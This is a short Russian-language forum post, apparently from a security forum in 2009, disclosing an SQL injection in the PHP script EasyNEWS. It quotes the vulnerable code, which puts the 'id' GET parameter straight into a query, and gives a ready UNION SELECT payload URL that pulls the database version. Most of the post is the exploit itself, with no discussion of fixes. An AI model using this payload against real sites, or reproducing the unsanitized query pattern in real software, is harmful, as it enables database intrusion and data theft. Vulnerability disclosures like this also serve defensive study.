15.11.2009, 01:18
|
|
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
Провел на форуме:
2083691
Репутация:
330
|
|
EasyNEWS SQL injection
easynews.php:
PHP код:
...
if (isset($_GET['id'])) {
$id = $_GET['id'];
$query = 'SELECT * FROM `'.$table_name.'` WHERE newstime='.$id.'';
...
Эксплаьация:
Код:
http://localhost/10/easynews.php?id=1+union+select+1,version(),3,4,5,6--+
|
|
|